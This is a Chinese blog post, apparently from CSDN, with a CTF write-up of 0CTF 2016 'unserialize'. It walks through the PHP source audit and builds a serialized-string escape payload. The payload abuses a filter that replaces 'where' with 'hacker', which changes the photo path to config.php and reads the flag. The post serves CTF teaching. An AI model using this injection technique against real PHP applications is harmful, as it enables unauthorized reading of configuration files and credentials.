ctf之php序列化,0ctf_2016_unserialize(php反序列化逃逸字符)

最新推荐文章于 2024-07-10 17:18:54 发布
最新推荐文章于 2024-07-10 17:18:54 发布
阅读量1k 收藏
点赞数
文章标签: ctf之php序列化

一.0ctf_2016_unserialize(php反序列化逃逸字符)1

2

3

4知识点:

* 代码审计

* Unserialize

* LFR

通过源码,我们可以发现在config.php中的flag,这题意图已经很明显了,是要我们读取config.php文件的内容。1

2

3

4

5

6

7<?php

$config['hostname'] = '127.0.0.1';

$config['username'] = 'root';

$config['password'] = '';

$config['database'] = '';

$flag = '';

?>

注册并登入,在cookie里发现bottle.session,说明很有可能这道题目是由Python的 bottle框架搭建的,与此同时在profile.php找到$profile = unserialize($profile);, $photo = base64_encode(file_get_contents($profile['photo']));中包含有unserialize与file_get_contents,猜测这道题是需要利用unserialize反序列构造file_get_contents执行RCE。1

2

3

4

5$profile = unserialize($profile);

$phone = $profile['phone'];

$email = $profile['email'];

$nickname = $profile['nickname'];

$photo = base64_encode(file_get_contents($profile['photo']));

可以看到无论是file_get_contents($profile['photo']),还是unserialize($profile)都是通过$profile进行控制的,我们现在看看$profile变量能否被我们控制1

2

3$username = $_SESSION['username'];

$profile=$user->show_profile($username);

if($profile == null) {

经过查找我们可以发现$profile 变量来源于show_profile方法,我们通过传入一个$username变量后引用了父类mysql的方法filter、select,最后返回了一个$object,而profile就是在这个$object变量中,让我看看mysql类中的函数1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39class user {

...

...

public function show_profile($username) {

$username = parent::filter($username);

$where = "username = '$username'";

$object = parent::select($this->table, $where);

return $object->profile;

}

...

...

}

class mysql {

private $link = null;

...

...

public function select($table, $where, $ret = '*') {

$sql = "SELECT $ret FROM $table WHERE $where";

$result = mysql_query($sql, $this->link);

return mysql_fetch_object($result);

}

...

...

public function filter($string) {

$escape = array(''', '\\');

$escape = '/' . implode('|', $escape) . '/';

$string = preg_replace($escape, '_', $string);

$safe = array('select', 'insert', 'update', 'delete', 'where');

$safe = '/' . implode('|', $safe) . '/i';

return preg_replace($safe, 'hacker', $string);

}

public function __tostring() {

return __class__;

}

}

这一连串代码作用已经很明显是要验证用户信息的。filter方法防止我们将会过滤符号,\字符串select,insert,update,delete。

经过寻找我们可以找到

$profile['photo']) 是源于update.php中 $profile['photo'] = 'upload/' . md5($file['name']);1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20if(!preg_match('/^d{11}$/', $_POST['phone']))

die('Invalid phone');

if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))

die('Invalid email');

if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)

die('Invalid nickname');

$file = $_FILES['photo'];

if($file['size'] < 5 or $file['size'] > 1000000)

die('Photo size error');

move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));

$profile['phone'] = $_POST['phone'];

$profile['email'] = $_POST['email'];

$profile['nickname'] = $_POST['nickname'];

$profile['photo'] = 'upload/' . md5($file['name']);

$user->update_profile($username, serialize($profile));

echo 'Update Profile Success!Your Profile';

原本这段其实是没有问题的,关键是它先将$profile进行序列化后再进行存入数据库,而filter函数中会将where字符串转换成hacker,where是五个字符而hacker是六个字符,这样就给我提供了反序列化逃逸字符的条件1

2

3

4

5

6

7

8

9public function filter($string) {

$escape = array(''', '\\');

$escape = '/' . implode('|', $escape) . '/';

$string = preg_replace($escape, '_', $string);

$safe = array('select', 'insert', 'update', 'delete', 'where');

$safe = '/' . implode('|', $safe) . '/i';

return preg_replace($safe, 'hacker', $string);

}

反序列化逃逸字符1

2

3

4

5

6

7

8

9<?php

//Enter your code here, enjoy!

$profile['phone'] = '11115908609';

$profile['email'] = '[email protected]';

$profile['nickname'] = 'aa';

$profile['photo'] = 'aaa';

$a=serialize($profile);

echo $a;

输出1a:4:{s:5:"phone";s:11:"11115908609";s:5:"email";s:17:"[email protected]";s:8:"nickname";s:2:"aa";s:5:"photo";s:3:"aaa";}

我们修改下1$profile['nickname'] = 'aa";s:5:"photo";s:3:"aaa";}';

输出1a:4:{s:5:"phone";s:11:"11115908609";s:5:"email";s:17:"[email protected]";s:8:"nickname";s:27:"aa";s:5:"photo";s:3:"aaa";}";s:5:"photo";s:3:"aaa";}

因为多出";s:5:"photo";s:3:"aaa";}

于是我们可以hacker比where多的字符将其顶替,这里多处的字符用1代替

比如这样1a:4:{s:5:"phone";s:11:"11115908609";s:5:"email";s:17:"[email protected]";s:8:"nickname";s:27:"aa1111111111111111111111111";s:5:"photo";s:3:"aaa";}";s:5:"photo";s:3:"aaa";}

最后得到

ebd9334db73a3f5bf99c7f41946bb10e.png

同理我们可以将aaa换成我们想要的比如config.php就可以读出flag了,

将得到的base64解码后的到flag

310d557d92f9b2dcbf6569b83ebe0bfb.png

参考

weixin_39769228
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[渗透测试笔记] 14.php反序列化及利用原理
H4ppyD0g的博客
09-30 684
php序列化反序列化 php序列化就是将复杂的数据类型(比如说数组,字典,或者一个对象)转换为字符串,方便传输或者存库等操作,并且之后还能后恢复成原来的数据类型的过程。这样可以在不用这个数据的时候让它占用尽可能少的空间。 要注意的是,序列化只是对他的变量进行序列化,类中的函数是不会参与进来的。 php序列化反序列化的函数 serialize() 用于序列化对象或数组,并返回一个字符串。序列化对象后,可以很方便的将它传递给其他需要它的地方,且其类型和结构不会改变。 unseriali
php反序列化长度变化尾部字符逃逸(0CTF-2016-piapiapia)
10-15
PHP反序列化长度变化尾部字符逃逸】是一种安全漏洞利用技术,通常出现在使用PHP的系统中。在PHP中,对象序列化是将对象转换为可存储或传输的字符串的过程,而反序列化则是将这个字符串恢复为原始对象的过程。...
0ctf_2016_unserialize
qq_53460654的博客
10-20 3023
打开环境 只有个登录框 应该存在源码泄露,直接试试访问www.zip 得到源码 直接自动代码审计 发现有疑似这些漏洞 但是没有找到我们的反序列化,因为题目就是反序列化 然后自己来审计一下 在profile.php中 $profile = unserialize($profile); $phone = $profile['phone']; $email = $profile['email']; $nickname = $profile['nickname']; $photo = base64_encode
[0ctf 2016]unserialize
最新发布
liaochonxiang的博客
07-10 380
以此推算,hacker比where多出一个字符,34个where即可。同时可以利用class.php中的filter过滤。由此想到可以将photo文件路径修改为。将base64解密即可得到flag。大致的查看源码,发现flag藏在。文件中发现调用photo文件路径。像这种反序列化题都会有源码。根据这个线,找到可利用点。抓包update.php。得到www.zip源码。那我们需要找到可以调出。所以需要多出34个字符。可以利用数组绕过过滤。
[CTFTraining] 0CTF 2016 Unserialize
ZXW_NUDT的博客
06-01 2555
[CTFTraining] 0CTF 2016 Unserialize
0ctf_2016 _Web_unserialize
怪味巧克力的博客
07-09 2762
0x01 拿到题目第一件事是进行目录扫描,看看都有哪些目录,结果如下: 不少,首先有源码,我们直接下载下来,因为有源码去分析比什么都没有更容易分析出漏洞所在。 通过这个知道,它一共有这么几个页面,首页登录页面,注册页面,update更改信息页面,这几个页面是我们能够直接接触到的,那想必flag应该在另外几个页面中,稍后我们分析。先来看看网站页面都是什么样子。 登录页面: 注册页面: 更改信息页面需要我们先登录,那我们就先随便注册一个,然后进去看看 到这里,基本上几个页面要进行的基本操作我们知道
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞。 反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
PHP反序列化漏洞详解.rar
02-07
在IT安全领域,PHP反序列化漏洞是一种常见的安全隐患,尤其在Web应用开发中。这个话题在CTF(Capture The Flag)网络安全竞赛中也常被用作挑战,因为理解和利用这种漏洞需要深入理解PHP语言和其内部工作原理。下面将...
ActiveMQ 反序列化漏洞(CVE-2015-5254)利用工具
08-15
在2015年,ActiveMQ被发现存在一个严重的安全漏洞,被称为CVE-2015-5254,这是一个反序列化漏洞,允许攻击者通过精心构造的恶意消息来执行任意代码,从而对目标系统造成重大威胁。 反序列化漏洞通常发生在对象从...
BMZCTF0ctf_2016_unserialize
末初的CSDN博客
02-04 715
http://bmzclub.cn/challenges#0ctf_2016_unserialize 网站根目录下www.zip有源码,看一些关键代码 update.php <?php require_once('class.php'); if($_SESSION['username'] == null) { die('Login First'); } if($_POST['phone'] && $_POST['email'] && $_POST['
CTF php 序列化,CTF-攻防世界-unserialize3(PHP序列化)
weixin_29228203的博客
03-18 349
题目 hmm....代码硬伤暴击..>_解题过程题目已经说明了这题是php反序列化。代码里面是一个类,类名xctf,类里面就一个string型变量,值为"111"。那么这题就是php的类的序列化。__wakeup方法是php的魔术方法,当调用反序列化函数unserialize()时,会默认检查类中是否存在__wakeup方法,如果存在,会先调用。这个方法的作用一般是用来在反序列化时做一...
CTF笔记 攻防世界Web_php_unserialize
qq_51248658的博客
10-08 334
做过几次反序列化题目,但都是看wp写出来的,也没有记住,所以记一下笔记。小白理解,有不对的地方,还请大佬们指出。通过代码审计进行利用反序列化漏洞(遇到不懂函数要自己去查),然后需要自己进行实例化得到序列化结果,需要多练。
unserialize php ctf,CTF-WEB-XTCTF-Web_php_unserialize
weixin_34677379的博客
03-26 317
题目来源XTCTF-Web_php_unserialize题目考点:PHP代码审计、PHP正则、PHP序列化反序列化解题思路题目源码class Demo {private $file = ‘index.php‘;public function __construct($file) {$this->file = $file;}function __destruct() {echo @high...
攻防世界 0ctf-unserialize(piapipia)
CyhDl666的博客
03-01 478
题目考点:任意文件读取 + php代码审计反序列化 我已经做题之前先dirsearch一下了 先尝试了一下流程 首先是注册页面注册 账号 接着在update界面取补充信息 最后返回发profile页面 里面有自己注册时候的信息 接着我们就来看看www.zip给的网页源码 register.php <?php require_once('class.php'); if($_POST['username'] && $_POST['password']) { $username.
0CTF-2016-piapiapia(PHP反序列化字符逃逸)
crispr的博客
03-06 1235
0CTF-2016-piapiapia(PHP反序列化字符逃逸) 0x01 前言 开学果然是对更新博客没得想法,趁着闲工夫,做了一下这个题,之前XCTF新春赛也出现了PHP反序列化逃逸,不过没做出来。。tcl,直接看题吧。 0x02 正文 这个题直接给你登录页面了,F12没有发现,sql注入也不太像,一般出现登录页面都会有注册页面,字典跑起来,发现有regester.php、config.php...
[0CTF 2016]piapiapia(反序列化逃逸
paidx0
09-02 734
偷了三天懒没有学习,哈哈哈,通宵看完了扫黑风暴 开始做题 打开环境,第一时间以为是SQL注入,用sqlmap跑了一下,并不是 找了一下也没有什么东西,就去扫一下他的敏感目录,扫到www.zip,下载下来 先用Seay快速审计一下,再去细看代码逻辑 知识点 1、代码审计 2、反序列化逃逸 来一起看看代码吧 先看看可能存在文件读取的profile.php 首先想到的就是利用反序列化,然后文件读取,继续跟进 $profile = $user->show_profile($username); 再看in
unserialize php ctf,ctf serialize 序列化反序列化
weixin_34571272的博客
03-26 589
反序列化图片.png和往常一样,先进入网址。这里我们可以看到上面的源代码。unserialize($str) === "$KEY"我们举个例子$arr=array();$arr['name']='张三';$arr['age']='22';$arr['sex']='男';$arr['phone']='123456789';$arr['address']='上海市浦东新区'; var_dump($ar...
PHP反序列化漏洞 ctfhub
07-28
PHP反序列化漏洞是一种常见的Web应用程序漏洞,它允许攻击者通过操纵序列化反序列化过程来执行恶意代码。这种漏洞通常出现在PHP应用程序中,特别是在使用不安全的反序列化函数(如`unserialize()`)时。 CTFHub是一个CTF(Capture The Flag)平台,旨在提供安全竞赛和训练平台,供安全爱好者学习和应对各种网络安全挑战。在CTFHub中,可能会涉及到PHP反序列化漏洞作为一个题目或挑战,参与者需要通过利用该漏洞来获取目标系统的控制权或敏感信息。 为了防止PHP反序列化漏洞,开发人员应该采取以下几个措施: 1. 验证和过滤用户输入:确保反序列化的数据来自可信任的来源,并对输入进行严格的验证和过滤,以防止恶意数据的注入。 2. 使用安全的序列化库:使用经过审计和被广泛接受的序列化库,如JSON或Protocol Buffers,而不是不安全的`unserialize()`函数。 3. 最小化反序列化操作:只反序列化必要的数据,并避免反序列化不受信任的或未知的数据。 4. 对敏感数据进行加密:如果必须在序列化过程中传输敏感数据,应该对其进行加密,以防止泄露。 希望以上信息对你有所帮助。如果你还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值